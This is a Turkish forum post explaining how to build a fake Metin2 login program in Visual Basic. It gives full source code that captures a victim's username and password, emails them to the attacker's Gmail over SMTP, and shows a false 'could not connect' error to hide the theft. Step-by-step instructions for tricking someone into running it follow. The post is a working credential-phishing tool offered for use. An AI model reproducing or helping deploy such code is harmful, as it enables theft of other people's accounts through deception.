mavzermete 1
mavzermete
Bvural41 1
Bvural41
noisiv 1
noisiv
Manwe Work 1
Manwe Work
xranzei 1
xranzei
Hikaye Ekle

Visual Basic İle Metin2 Fake Yapmak

  • Konuyu başlatan Konuyu başlatan hakan010203
  • Başlangıç tarihi Başlangıç tarihi
  • Cevaplar Cevaplar 9
  • Görüntüleme Görüntüleme 5K

HERAKLES Otomatik Avlı kalıcı sunucu. 19 Haziran'da açılıyor. Atius & Wizard güvencesiyle hemen kayıt ol, ön kayıt ödülleri aktif. HEMEN TIKLA!

Imports System.Net.Mail
Public Class Form1

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("Kullanıcı Adı Yanlış")
If TextBox2.Text = "" Then
MsgBox("Şifre Yanlış")
Else
End If
End If
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("GMAİLİNİZ", "GAMAİLİNİZİN ŞİFRESİ")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("KENDİ GMAİLİNİ")
mail.To.Add("GMAİLİNİZ")
mail.Subject = "Username : " & TextBox2.Text
mail.Body = "Password : " & TextBox1.Text & ","
smtpServer.Send(mail)
MsgBox("Servere Bağlanılamadı Lütfen Tekrar Deneyin")
End Sub

Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
Me.Close()
End Sub

Private Sub TextBox2_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox2.TextChanged

End Sub
End Class
_________________________________________________________________

İLK önce 2 buton 2 text box 2 tanede labelle bu işi yaparız
label boton ve text boxu kattıktan sora butona 2 defa tıklayıp yukarıdaki kodu yapıştırın GMAİLİNİZYazan yerlere kendi gmailinizi yazın ve programı oluşturun adama bunu bi şekilde yutturarak fakenizi yaparsınız adresler gmailinize gelecek
_________________________________________________________________

++REP PLSSS YAPAMAYANLAR MSNMİ EKLESİN

teqmen_01@hotmail.com

YADA ÖZELDEN MESAJ ATSINLAR
 
Son düzenleme:

Şu an konuyu görüntüleyenler (Toplam : 0, Üye: 0, Misafir: 0)

Geri
Üst